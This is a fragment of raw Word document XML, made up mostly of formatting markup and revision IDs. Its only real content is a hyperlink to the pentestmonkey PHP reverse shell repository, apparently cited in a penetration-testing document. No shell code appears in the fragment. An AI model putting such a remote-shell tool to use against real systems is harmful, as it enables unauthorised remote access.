    <w:p w14:paraId="1D82F4F5" w14:textId="77777777" w:rsidR="00D77414" w:rsidRPr="00C744F3" w:rsidRDefault="00D77414" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77414">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText>https://github.com/pentestmonkey/php-reverse-shell</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47D39C" w14:textId="43FC2EC6" w:rsidR="00A96EEE" w:rsidRPr="00A96EEE" w:rsidRDefault="00D77414" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C744F3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://github.com/pentestmonkey/php-reverse-shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D52F44" w14:textId="77777777" w:rsidR="00764E26" w:rsidRDefault="00764E26" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17ED3384" w14:textId="77777777" w:rsidR="0056561B" w:rsidRDefault="0056561B" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A91697E" w14:textId="77777777" w:rsidR="0056561B" w:rsidRDefault="0056561B" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0056561B" w:rsidSect="00C46EB2">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="851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634F" w14:textId="77777777" w:rsidR="00C46EB2" w:rsidRDefault="00C46EB2" w:rsidP="007669C4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C08BF0A" w14:textId="77777777" w:rsidR="00C46EB2" w:rsidRDefault="00C46EB2" w:rsidP="0076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72D7" w14:textId="77777777" w:rsidR="00C46EB2" w:rsidRDefault="00C46EB2" w:rsidP="007669C4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="77AB9E14" w14:textId="77777777" w:rsidR="00C46EB2" w:rsidRDefault="00C46EB2" w:rsidP="0076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57A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="403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73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9C4"/>
    <w:rsid w:val="00000DBC"/>
    <w:rsid w:val="0000167F"/>
    <w:rsid w:val="00005C89"/>
    <w:rsid w:val="00011A58"/>
    <w:rsid w:val="00017787"/>
    <w:rsid w:val="00025A50"/>
    <w:rsid w:val="000303FE"/>
    <w:rsid w:val="000305B8"/>
    <w:rsid w:val="0003100F"/>
    <w:rsid w:val="00034AC2"/>
    <w:rsid w:val="0003522A"/>
    <w:rsid w:val="0003748B"/>
    <w:rsid w:val="00044262"/>
    <w:rsid w:val="00044534"/>
    <w:rsid w:val="00046211"/>
    <w:rsid w:val="000515B2"/>
    <w:rsid w:val="00051D27"/>
    <w:rsid w:val="00052FD2"/>
    <w:rsid w:val="0005589C"/>
    <w:rsid w:val="00062ECA"/>
    <w:rsid w:val="00071C1D"/>
    <w:rsid w:val="00074B0D"/>
    <w:rsid w:val="000757A5"/>
    <w:rsid w:val="000761C8"/>
    <w:rsid w:val="000865CB"/>
    <w:rsid w:val="00086B21"/>
    <w:rsid w:val="0009066D"/>
    <w:rsid w:val="00090BA5"/>
    <w:rsid w:val="00095818"/>
    <w:rsid w:val="00096354"/>
    <w:rsid w:val="000A1187"/>
    <w:rsid w:val="000A3B9B"/>
    <w:rsid w:val="000A58C0"/>
    <w:rsid w:val="000B2E4F"/>
    <w:rsid w:val="000B325D"/>
    <w:rsid w:val="000B40DA"/>
    <w:rsid w:val="000B4DF7"/>
    <w:rsid w:val="000B59FE"/>
    <w:rsid w:val="000B64BD"/>
    <w:rsid w:val="000B75C1"/>
    <w:rsid w:val="000C4330"/>
    <w:rsid w:val="000C5821"/>
    <w:rsid w:val="000C5C93"/>
    <w:rsid w:val="000C73F3"/>
    <w:rsid w:val="000D3725"/>
    <w:rsid w:val="000D74C6"/>
    <w:rsid w:val="000E112F"/>
    <w:rsid w:val="000E1631"/>
    <w:rsid w:val="000F064B"/>
    <w:rsid w:val="000F5E83"/>
    <w:rsid w:val="000F7BB5"/>
    <w:rsid w:val="00100D7A"/>
    <w:rsid w:val="001055E8"/>
    <w:rsid w:val="0011187E"/>
    <w:rsid w:val="001119B7"/>
    <w:rsid w:val="00113630"/>
    <w:rsid w:val="00114D64"/>
    <w:rsid w:val="0011636C"/>
    <w:rsid w:val="00116928"/>
    <w:rsid w:val="001305B4"/>
    <w:rsid w:val="00132174"/>
    <w:rsid w:val="001364C2"/>
    <w:rsid w:val="0015025D"/>
    <w:rsid w:val="001601EE"/>
    <w:rsid w:val="00160B1A"/>
    <w:rsid w:val="00160BCF"/>
    <w:rsid w:val="001614FD"/>
    <w:rsid w:val="00164BA0"/>
    <w:rsid w:val="00172B95"/>
    <w:rsid w:val="0017341A"/>
    <w:rsid w:val="00173621"/>
    <w:rsid w:val="00184027"/>
    <w:rsid w:val="001852F0"/>
    <w:rsid w:val="0018576E"/>
    <w:rsid w:val="00187CC0"/>
    <w:rsid w:val="001925B9"/>
    <w:rsid w:val="001950EE"/>
    <w:rsid w:val="00196D20"/>
    <w:rsid w:val="001A4EDA"/>
    <w:rsid w:val="001B03BC"/>
    <w:rsid w:val="001B30C2"/>
    <w:rsid w:val="001C01D1"/>
    <w:rsid w:val="001C0C47"/>
    <w:rsid w:val="001C6E80"/>
    <w:rsid w:val="001D175B"/>
    <w:rsid w:val="001D1A5C"/>
    <w:rsid w:val="001F0C85"/>
    <w:rsid w:val="001F64ED"/>
    <w:rsid w:val="001F6FE5"/>
    <w:rsid w:val="00200761"/>
    <w:rsid w:val="00204893"/>
    <w:rsid w:val="00215110"/>
    <w:rsid w:val="00234079"/>
    <w:rsid w:val="002405CD"/>
    <w:rsid w:val="00242C71"/>
    <w:rsid w:val="002563B0"/>
    <w:rsid w:val="00262023"/>
    <w:rsid w:val="0026308B"/>
    <w:rsid w:val="00263485"/>
    <w:rsid w:val="0026778C"/>
    <w:rsid w:val="00267C8B"/>
    <w:rsid w:val="0027115D"/>
    <w:rsid w:val="002727F8"/>
    <w:rsid w:val="00281C74"/>
    <w:rsid w:val="00281D5C"/>
    <w:rsid w:val="00282EC9"/>
    <w:rsid w:val="0028548E"/>
    <w:rsid w:val="0028620D"/>
    <w:rsid w:val="002921DE"/>
    <w:rsid w:val="002A6FCE"/>
    <w:rsid w:val="002B4BC7"/>
    <w:rsid w:val="002C0248"/>
    <w:rsid w:val="002C03E7"/>
    <w:rsid w:val="002C4709"/>
    <w:rsid w:val="002C743B"/>
    <w:rsid w:val="002D0ADD"/>
    <w:rsid w:val="002D5496"/>
    <w:rsid w:val="002E109D"/>
    <w:rsid w:val="002E48D4"/>
    <w:rsid w:val="002E64BF"/>
    <w:rsid w:val="002F00F1"/>
    <w:rsid w:val="002F3EEC"/>
    <w:rsid w:val="002F4B93"/>
    <w:rsid w:val="00314F36"/>
    <w:rsid w:val="003160C8"/>
    <w:rsid w:val="00316B1D"/>
    <w:rsid w:val="003215C2"/>
    <w:rsid w:val="00335C5A"/>
    <w:rsid w:val="00337124"/>
    <w:rsid w:val="00337174"/>
    <w:rsid w:val="00337BB1"/>
    <w:rsid w:val="0034096F"/>
    <w:rsid w:val="00342A22"/>
    <w:rsid w:val="00342A33"/>
    <w:rsid w:val="003461AE"/>
    <w:rsid w:val="003522D8"/>
    <w:rsid w:val="003534C3"/>
    <w:rsid w:val="0036220A"/>
    <w:rsid w:val="00366C1A"/>
    <w:rsid w:val="0037426E"/>
    <w:rsid w:val="00374744"/>
    <w:rsid w:val="00377015"/>
    <w:rsid w:val="00382280"/>
    <w:rsid w:val="003824CF"/>
    <w:rsid w:val="00386B1B"/>
    <w:rsid w:val="003958BE"/>
    <w:rsid w:val="003A1709"/>
    <w:rsid w:val="003B1A5C"/>
    <w:rsid w:val="003B3765"/>
    <w:rsid w:val="003B48ED"/>
    <w:rsid w:val="003B5DE3"/>
    <w:rsid w:val="003C4481"/>
    <w:rsid w:val="003C6C5E"/>
    <w:rsid w:val="003D1AF6"/>
    <w:rsid w:val="003D2040"/>
    <w:rsid w:val="003D3B8A"/>
    <w:rsid w:val="003D44EF"/>
    <w:rsid w:val="003D5141"/>
    <w:rsid w:val="003D7209"/>
    <w:rsid w:val="003D7C42"/>
    <w:rsid w:val="003E4E4E"/>
    <w:rsid w:val="003E649A"/>
    <w:rsid w:val="003E68D1"/>
    <w:rsid w:val="003E6BC1"/>
    <w:rsid w:val="003F54AC"/>
    <w:rsid w:val="003F5731"/>
    <w:rsid w:val="003F5783"/>
    <w:rsid w:val="003F6607"/>
    <w:rsid w:val="003F776A"/>
    <w:rsid w:val="00403238"/>
    <w:rsid w:val="00403282"/>
    <w:rsid w:val="004053E1"/>
    <w:rsid w:val="00406B55"/>
    <w:rsid w:val="004100D9"/>
    <w:rsid w:val="0041091D"/>
    <w:rsid w:val="00410A21"/>
    <w:rsid w:val="00415644"/>
    <w:rsid w:val="00415BBB"/>
    <w:rsid w:val="004271B1"/>
    <w:rsid w:val="004327D5"/>
    <w:rsid w:val="004336F7"/>
    <w:rsid w:val="00437808"/>
    <w:rsid w:val="00440370"/>
    <w:rsid w:val="0044040B"/>
    <w:rsid w:val="00444FB8"/>
    <w:rsid w:val="00451065"/>
    <w:rsid w:val="0045409B"/>
    <w:rsid w:val="004553E2"/>
    <w:rsid w:val="00457919"/>
    <w:rsid w:val="004602C0"/>
    <w:rsid w:val="004611B2"/>
    <w:rsid w:val="0046166A"/>
    <w:rsid w:val="004616E4"/>
    <w:rsid w:val="00464B5A"/>
    <w:rsid w:val="00466B9D"/>
    <w:rsid w:val="00470BBE"/>
    <w:rsid w:val="004732C3"/>
    <w:rsid w:val="0048015A"/>
    <w:rsid w:val="00480E69"/>
    <w:rsid w:val="00481C50"/>
    <w:rsid w:val="00483E99"/>
    <w:rsid w:val="004855C1"/>
    <w:rsid w:val="00485F15"/>
    <w:rsid w:val="004A0857"/>
    <w:rsid w:val="004A1B69"/>
    <w:rsid w:val="004A6CF8"/>
    <w:rsid w:val="004A7D6A"/>
    <w:rsid w:val="004B65DC"/>
    <w:rsid w:val="004C2539"/>
    <w:rsid w:val="004C286E"/>
    <w:rsid w:val="004D44B1"/>
    <w:rsid w:val="004E2648"/>
    <w:rsid w:val="004F3D21"/>
    <w:rsid w:val="004F54B9"/>
    <w:rsid w:val="00510207"/>
    <w:rsid w:val="00512E20"/>
    <w:rsid w:val="00514B6A"/>
    <w:rsid w:val="005164F2"/>
    <w:rsid w:val="005241F8"/>
    <w:rsid w:val="00525166"/>
    <w:rsid w:val="00525716"/>
    <w:rsid w:val="005309F3"/>
    <w:rsid w:val="00531F28"/>
    <w:rsid w:val="00534900"/>
    <w:rsid w:val="00535E0E"/>
    <w:rsid w:val="005375D3"/>
    <w:rsid w:val="00542A96"/>
    <w:rsid w:val="005529E9"/>
    <w:rsid w:val="00563921"/>
    <w:rsid w:val="00564E15"/>
    <w:rsid w:val="00565075"/>
    <w:rsid w:val="0056561B"/>
    <w:rsid w:val="0056593E"/>
    <w:rsid w:val="005665FE"/>
    <w:rsid w:val="0057088F"/>
    <w:rsid w:val="00571F59"/>
    <w:rsid w:val="005819EB"/>
    <w:rsid w:val="00584DAF"/>
    <w:rsid w:val="0058643F"/>
    <w:rsid w:val="00593091"/>
    <w:rsid w:val="0059724F"/>
    <w:rsid w:val="00597780"/>
    <w:rsid w:val="00597FC7"/>
    <w:rsid w:val="005A6900"/>
    <w:rsid w:val="005A6A4B"/>
    <w:rsid w:val="005B2B37"/>
    <w:rsid w:val="005B4CD3"/>
    <w:rsid w:val="005B66C9"/>
    <w:rsid w:val="005C5892"/>
    <w:rsid w:val="005C7C2F"/>
    <w:rsid w:val="005D1CB6"/>
    <w:rsid w:val="005D7652"/>
    <w:rsid w:val="005D7F2E"/>
    <w:rsid w:val="005E6726"/>
    <w:rsid w:val="005F3B12"/>
    <w:rsid w:val="005F67C0"/>
    <w:rsid w:val="005F7AB0"/>
    <w:rsid w:val="005F7EC6"/>
    <w:rsid w:val="006006EA"/>
    <w:rsid w:val="0060298D"/>
    <w:rsid w:val="00603DD2"/>
    <w:rsid w:val="006045C8"/>
    <w:rsid w:val="00604B1B"/>
    <w:rsid w:val="0060697B"/>
    <w:rsid w:val="00606C55"/>
    <w:rsid w:val="00606E84"/>
    <w:rsid w:val="0061100B"/>
    <w:rsid w:val="006163EF"/>
    <w:rsid w:val="00624C38"/>
    <w:rsid w:val="0062684B"/>
    <w:rsid w:val="0063204A"/>
    <w:rsid w:val="00633D09"/>
    <w:rsid w:val="00640AB3"/>
    <w:rsid w:val="00641088"/>
    <w:rsid w:val="00641C57"/>
    <w:rsid w:val="006434C1"/>
    <w:rsid w:val="00645E8C"/>
    <w:rsid w:val="00647510"/>
    <w:rsid w:val="00647CB4"/>
    <w:rsid w:val="006612C8"/>
    <w:rsid w:val="00664187"/>
    <w:rsid w:val="00664772"/>
    <w:rsid w:val="00666F08"/>
    <w:rsid w:val="006740D1"/>
    <w:rsid w:val="00676F6F"/>
    <w:rsid w:val="00683B5B"/>
    <w:rsid w:val="0068508C"/>
    <w:rsid w:val="0068693A"/>
    <w:rsid w:val="0069130C"/>
    <w:rsid w:val="00694831"/>
    <w:rsid w:val="006A000F"/>
    <w:rsid w:val="006A3F05"/>
    <w:rsid w:val="006B0D71"/>
    <w:rsid w:val="006B130E"/>
    <w:rsid w:val="006C0049"/>
    <w:rsid w:val="006C0B50"/>
    <w:rsid w:val="006C247B"/>
    <w:rsid w:val="006C63A6"/>
    <w:rsid w:val="006C71A5"/>
    <w:rsid w:val="006D23F1"/>
    <w:rsid w:val="006D36C4"/>
    <w:rsid w:val="006D58DB"/>
    <w:rsid w:val="006D681E"/>
    <w:rsid w:val="006E4A8A"/>
    <w:rsid w:val="006E6BBE"/>
    <w:rsid w:val="006F0818"/>
    <w:rsid w:val="006F12AF"/>
    <w:rsid w:val="006F1487"/>
    <w:rsid w:val="006F3E8B"/>
    <w:rsid w:val="006F5C4D"/>
    <w:rsid w:val="006F70E6"/>
    <w:rsid w:val="006F72C9"/>
    <w:rsid w:val="007064A6"/>
    <w:rsid w:val="0071227F"/>
    <w:rsid w:val="0071294A"/>
    <w:rsid w:val="007133C1"/>
    <w:rsid w:val="00723548"/>
    <w:rsid w:val="0073144B"/>
    <w:rsid w:val="00734DF2"/>
    <w:rsid w:val="00736743"/>
    <w:rsid w:val="007369E1"/>
    <w:rsid w:val="00740B7A"/>
    <w:rsid w:val="00740F4C"/>
    <w:rsid w:val="00742995"/>
    <w:rsid w:val="00744EC4"/>
    <w:rsid w:val="00746876"/>
    <w:rsid w:val="00747DD6"/>
    <w:rsid w:val="007521EB"/>
    <w:rsid w:val="00756E96"/>
    <w:rsid w:val="00764E26"/>
    <w:rsid w:val="007669C4"/>
    <w:rsid w:val="00771C36"/>
    <w:rsid w:val="007724B2"/>
    <w:rsid w:val="00773E7D"/>
    <w:rsid w:val="007743D6"/>
    <w:rsid w:val="00776CE9"/>
    <w:rsid w:val="007777A1"/>
    <w:rsid w:val="00777AEC"/>
    <w:rsid w:val="00780252"/>
    <w:rsid w:val="00781016"/>
    <w:rsid w:val="0078184B"/>
    <w:rsid w:val="00783708"/>
    <w:rsid w:val="00784A7F"/>
    <w:rsid w:val="007852D7"/>
    <w:rsid w:val="00786C6D"/>
    <w:rsid w:val="007877DD"/>
    <w:rsid w:val="00791132"/>
    <w:rsid w:val="00792244"/>
    <w:rsid w:val="0079260F"/>
    <w:rsid w:val="00792BB5"/>
    <w:rsid w:val="00792F77"/>
    <w:rsid w:val="007A6B7F"/>
    <w:rsid w:val="007A7F4D"/>
    <w:rsid w:val="007B5E3C"/>
    <w:rsid w:val="007B789B"/>
    <w:rsid w:val="007C0B82"/>
    <w:rsid w:val="007C5277"/>
    <w:rsid w:val="007C54F2"/>
    <w:rsid w:val="007C58F9"/>
    <w:rsid w:val="007C714C"/>
    <w:rsid w:val="007E56C0"/>
    <w:rsid w:val="007E66F3"/>
    <w:rsid w:val="007E6CA5"/>
    <w:rsid w:val="007F1F39"/>
    <w:rsid w:val="007F2598"/>
    <w:rsid w:val="007F3DC9"/>
    <w:rsid w:val="0080289D"/>
    <w:rsid w:val="008053EE"/>
    <w:rsid w:val="0082453D"/>
    <w:rsid w:val="0082577A"/>
    <w:rsid w:val="00831AFB"/>
    <w:rsid w:val="008324AE"/>
    <w:rsid w:val="008403AD"/>
    <w:rsid w:val="008432BE"/>
    <w:rsid w:val="00844878"/>
    <w:rsid w:val="0084790B"/>
    <w:rsid w:val="00860BB4"/>
    <w:rsid w:val="008612C2"/>
    <w:rsid w:val="00861895"/>
    <w:rsid w:val="0086634E"/>
    <w:rsid w:val="0087201F"/>
    <w:rsid w:val="00876DFF"/>
    <w:rsid w:val="00887356"/>
    <w:rsid w:val="00894631"/>
    <w:rsid w:val="008965D8"/>
    <w:rsid w:val="008972A1"/>
    <w:rsid w:val="008A18F4"/>
    <w:rsid w:val="008A56EA"/>
    <w:rsid w:val="008A6445"/>
    <w:rsid w:val="008B2841"/>
    <w:rsid w:val="008C46AC"/>
    <w:rsid w:val="008C5FEB"/>
    <w:rsid w:val="008D1972"/>
    <w:rsid w:val="008D290A"/>
    <w:rsid w:val="008F1BC7"/>
    <w:rsid w:val="00900C17"/>
    <w:rsid w:val="00902F40"/>
    <w:rsid w:val="009050A9"/>
    <w:rsid w:val="00906C26"/>
    <w:rsid w:val="00907BAC"/>
    <w:rsid w:val="00912DC8"/>
    <w:rsid w:val="0091353C"/>
    <w:rsid w:val="00913758"/>
    <w:rsid w:val="00914797"/>
    <w:rsid w:val="00920316"/>
    <w:rsid w:val="00920709"/>
    <w:rsid w:val="00921074"/>
    <w:rsid w:val="0092344D"/>
    <w:rsid w:val="00924569"/>
    <w:rsid w:val="009346E5"/>
    <w:rsid w:val="0093487E"/>
    <w:rsid w:val="00944BBD"/>
    <w:rsid w:val="00945223"/>
    <w:rsid w:val="00947E8D"/>
    <w:rsid w:val="00952045"/>
    <w:rsid w:val="00955352"/>
    <w:rsid w:val="00960A59"/>
    <w:rsid w:val="0096106B"/>
    <w:rsid w:val="00961834"/>
    <w:rsid w:val="00975397"/>
    <w:rsid w:val="00980C6D"/>
    <w:rsid w:val="0098203C"/>
    <w:rsid w:val="0098640A"/>
    <w:rsid w:val="00990490"/>
    <w:rsid w:val="009960DB"/>
    <w:rsid w:val="009A6069"/>
    <w:rsid w:val="009A79E6"/>
    <w:rsid w:val="009C28EC"/>
    <w:rsid w:val="009C543A"/>
    <w:rsid w:val="009C57E5"/>
    <w:rsid w:val="009C5A2B"/>
    <w:rsid w:val="009C5A39"/>
    <w:rsid w:val="009C6FB9"/>
    <w:rsid w:val="009D7965"/>
    <w:rsid w:val="009E06BC"/>
    <w:rsid w:val="009E18E1"/>
    <w:rsid w:val="009F3018"/>
    <w:rsid w:val="009F3C1C"/>
    <w:rsid w:val="009F72BD"/>
    <w:rsid w:val="009F7889"/>
    <w:rsid w:val="00A153F7"/>
    <w:rsid w:val="00A17DCD"/>
    <w:rsid w:val="00A352FE"/>
    <w:rsid w:val="00A35C55"/>
    <w:rsid w:val="00A37B09"/>
    <w:rsid w:val="00A444F8"/>
    <w:rsid w:val="00A5417D"/>
    <w:rsid w:val="00A57CA1"/>
    <w:rsid w:val="00A60E9A"/>
    <w:rsid w:val="00A61D5A"/>
    <w:rsid w:val="00A63482"/>
    <w:rsid w:val="00A6714C"/>
    <w:rsid w:val="00A70F48"/>
    <w:rsid w:val="00A71D3E"/>
    <w:rsid w:val="00A73177"/>
    <w:rsid w:val="00A74469"/>
    <w:rsid w:val="00A81072"/>
    <w:rsid w:val="00A82C83"/>
    <w:rsid w:val="00A83A4F"/>
    <w:rsid w:val="00A9358D"/>
    <w:rsid w:val="00A96EEE"/>
    <w:rsid w:val="00AA04B1"/>
    <w:rsid w:val="00AA1945"/>
    <w:rsid w:val="00AA3BF3"/>
    <w:rsid w:val="00AA4403"/>
    <w:rsid w:val="00AA4DB0"/>
    <w:rsid w:val="00AA68DB"/>
    <w:rsid w:val="00AA77BE"/>
    <w:rsid w:val="00AB046D"/>
    <w:rsid w:val="00AB3525"/>
    <w:rsid w:val="00AB404F"/>
    <w:rsid w:val="00AC05F4"/>
    <w:rsid w:val="00AC14EC"/>
    <w:rsid w:val="00AC15E9"/>
    <w:rsid w:val="00AC5CBC"/>
    <w:rsid w:val="00AC64D2"/>
    <w:rsid w:val="00AC78A5"/>
    <w:rsid w:val="00AC7B94"/>
    <w:rsid w:val="00AC7DDF"/>
    <w:rsid w:val="00AD0A2E"/>
    <w:rsid w:val="00AE0C92"/>
    <w:rsid w:val="00AE34BF"/>
    <w:rsid w:val="00AE4C9A"/>
    <w:rsid w:val="00AE73DE"/>
    <w:rsid w:val="00AF2263"/>
    <w:rsid w:val="00AF593D"/>
    <w:rsid w:val="00B0230E"/>
    <w:rsid w:val="00B06042"/>
    <w:rsid w:val="00B07A4F"/>
    <w:rsid w:val="00B103A9"/>
    <w:rsid w:val="00B10649"/>
    <w:rsid w:val="00B10684"/>
    <w:rsid w:val="00B20CD8"/>
    <w:rsid w:val="00B276D1"/>
    <w:rsid w:val="00B30572"/>
    <w:rsid w:val="00B35DBB"/>
    <w:rsid w:val="00B36586"/>
    <w:rsid w:val="00B406CA"/>
    <w:rsid w:val="00B429BB"/>
    <w:rsid w:val="00B46CFB"/>
    <w:rsid w:val="00B47ADE"/>
    <w:rsid w:val="00B50AC0"/>
    <w:rsid w:val="00B5180D"/>
    <w:rsid w:val="00B562A5"/>
    <w:rsid w:val="00B568CF"/>
    <w:rsid w:val="00B56B73"/>
    <w:rsid w:val="00B578C4"/>
    <w:rsid w:val="00B61AE1"/>
    <w:rsid w:val="00B71E8D"/>
    <w:rsid w:val="00B71F04"/>
    <w:rsid w:val="00B71F29"/>
    <w:rsid w:val="00B73B42"/>
    <w:rsid w:val="00B8071B"/>
    <w:rsid w:val="00B81152"/>
    <w:rsid w:val="00B8670F"/>
    <w:rsid w:val="00B86F72"/>
    <w:rsid w:val="00B96AF8"/>
    <w:rsid w:val="00BA49B4"/>
    <w:rsid w:val="00BA4AF4"/>
    <w:rsid w:val="00BA75B7"/>
    <w:rsid w:val="00BB3578"/>
    <w:rsid w:val="00BB3CF4"/>
    <w:rsid w:val="00BC55CF"/>
    <w:rsid w:val="00BD3CD1"/>
    <w:rsid w:val="00BD7F0C"/>
    <w:rsid w:val="00BE155E"/>
    <w:rsid w:val="00BE4935"/>
    <w:rsid w:val="00BE57F2"/>
    <w:rsid w:val="00BF1DF5"/>
    <w:rsid w:val="00BF297B"/>
    <w:rsid w:val="00BF47AF"/>
    <w:rsid w:val="00BF7A5A"/>
    <w:rsid w:val="00C035F9"/>
    <w:rsid w:val="00C1298A"/>
    <w:rsid w:val="00C14DCC"/>
    <w:rsid w:val="00C15205"/>
    <w:rsid w:val="00C15F27"/>
    <w:rsid w:val="00C209FD"/>
    <w:rsid w:val="00C22080"/>
    <w:rsid w:val="00C24310"/>
    <w:rsid w:val="00C27C00"/>
    <w:rsid w:val="00C404F0"/>
    <w:rsid w:val="00C40B24"/>
    <w:rsid w:val="00C439DC"/>
    <w:rsid w:val="00C43C1F"/>
    <w:rsid w:val="00C46EB2"/>
    <w:rsid w:val="00C55508"/>
    <w:rsid w:val="00C56510"/>
    <w:rsid w:val="00C603BC"/>
    <w:rsid w:val="00C6041B"/>
    <w:rsid w:val="00C61425"/>
    <w:rsid w:val="00C6791D"/>
    <w:rsid w:val="00C70608"/>
    <w:rsid w:val="00C72650"/>
    <w:rsid w:val="00C72C3B"/>
    <w:rsid w:val="00C8070C"/>
    <w:rsid w:val="00C81B22"/>
    <w:rsid w:val="00C81EE2"/>
    <w:rsid w:val="00C82A23"/>
    <w:rsid w:val="00C830E9"/>
    <w:rsid w:val="00C91A5A"/>
    <w:rsid w:val="00CA1C13"/>
    <w:rsid w:val="00CA1E0F"/>
    <w:rsid w:val="00CA6028"/>
    <w:rsid w:val="00CA68B2"/>
    <w:rsid w:val="00CB09E3"/>
    <w:rsid w:val="00CB2C94"/>
    <w:rsid w:val="00CB5A08"/>
    <w:rsid w:val="00CC07B5"/>
    <w:rsid w:val="00CD59E3"/>
    <w:rsid w:val="00CD5B7B"/>
    <w:rsid w:val="00CE52D4"/>
    <w:rsid w:val="00CE59BD"/>
    <w:rsid w:val="00CE5C62"/>
    <w:rsid w:val="00CF1199"/>
    <w:rsid w:val="00CF27FB"/>
    <w:rsid w:val="00CF32D7"/>
    <w:rsid w:val="00CF6A10"/>
    <w:rsid w:val="00CF6B21"/>
    <w:rsid w:val="00CF720E"/>
    <w:rsid w:val="00D01F44"/>
    <w:rsid w:val="00D0255A"/>
    <w:rsid w:val="00D051AE"/>
    <w:rsid w:val="00D12245"/>
    <w:rsid w:val="00D2181B"/>
    <w:rsid w:val="00D22DD9"/>
    <w:rsid w:val="00D31EC8"/>
    <w:rsid w:val="00D3256C"/>
    <w:rsid w:val="00D36DE7"/>
    <w:rsid w:val="00D42747"/>
    <w:rsid w:val="00D4355C"/>
    <w:rsid w:val="00D44E7E"/>
    <w:rsid w:val="00D46760"/>
    <w:rsid w:val="00D46C21"/>
    <w:rsid w:val="00D46C4C"/>
    <w:rsid w:val="00D52F58"/>
    <w:rsid w:val="00D639FA"/>
    <w:rsid w:val="00D662BE"/>
    <w:rsid w:val="00D724E2"/>
    <w:rsid w:val="00D75B10"/>
    <w:rsid w:val="00D75B6E"/>
    <w:rsid w:val="00D765E5"/>
    <w:rsid w:val="00D77414"/>
    <w:rsid w:val="00D81760"/>
    <w:rsid w:val="00D8674A"/>
    <w:rsid w:val="00D8686C"/>
    <w:rsid w:val="00D91ADB"/>
    <w:rsid w:val="00D9391B"/>
    <w:rsid w:val="00D94002"/>
    <w:rsid w:val="00D961FC"/>
    <w:rsid w:val="00DA0C3A"/>
    <w:rsid w:val="00DA50C6"/>
    <w:rsid w:val="00DB7237"/>
    <w:rsid w:val="00DC001A"/>
    <w:rsid w:val="00DC02FA"/>
    <w:rsid w:val="00DD1B9F"/>
    <w:rsid w:val="00DD1C60"/>
    <w:rsid w:val="00DD4340"/>
    <w:rsid w:val="00DD5586"/>
    <w:rsid w:val="00DD57D9"/>
    <w:rsid w:val="00DD5BD9"/>
    <w:rsid w:val="00DE04FE"/>
    <w:rsid w:val="00DF08CE"/>
    <w:rsid w:val="00DF32E9"/>
    <w:rsid w:val="00E01FDA"/>
    <w:rsid w:val="00E036A4"/>
    <w:rsid w:val="00E037C3"/>
    <w:rsid w:val="00E04E41"/>
    <w:rsid w:val="00E05AAC"/>
    <w:rsid w:val="00E074D7"/>
    <w:rsid w:val="00E1318C"/>
    <w:rsid w:val="00E145F1"/>
    <w:rsid w:val="00E30235"/>
    <w:rsid w:val="00E35AEF"/>
    <w:rsid w:val="00E3729F"/>
    <w:rsid w:val="00E467C0"/>
    <w:rsid w:val="00E52976"/>
    <w:rsid w:val="00E55EAD"/>
    <w:rsid w:val="00E667F9"/>
    <w:rsid w:val="00E73038"/>
    <w:rsid w:val="00E75F0C"/>
    <w:rsid w:val="00E820D6"/>
    <w:rsid w:val="00E902BD"/>
    <w:rsid w:val="00E945B5"/>
    <w:rsid w:val="00E955F2"/>
    <w:rsid w:val="00E96AA8"/>
    <w:rsid w:val="00EA0B40"/>
    <w:rsid w:val="00EA31B5"/>
    <w:rsid w:val="00EA3614"/>
    <w:rsid w:val="00EA3BB1"/>
    <w:rsid w:val="00EA6560"/>
    <w:rsid w:val="00EA7B9C"/>
    <w:rsid w:val="00EB6448"/>
    <w:rsid w:val="00EC3694"/>
    <w:rsid w:val="00EC6853"/>
    <w:rsid w:val="00EC6BFA"/>
    <w:rsid w:val="00ED50F0"/>
    <w:rsid w:val="00ED531B"/>
    <w:rsid w:val="00EE2E15"/>
    <w:rsid w:val="00EF2651"/>
    <w:rsid w:val="00EF481B"/>
    <w:rsid w:val="00F0254B"/>
    <w:rsid w:val="00F029D0"/>
    <w:rsid w:val="00F069EE"/>
    <w:rsid w:val="00F1227E"/>
    <w:rsid w:val="00F13E82"/>
    <w:rsid w:val="00F14115"/>
    <w:rsid w:val="00F14C84"/>
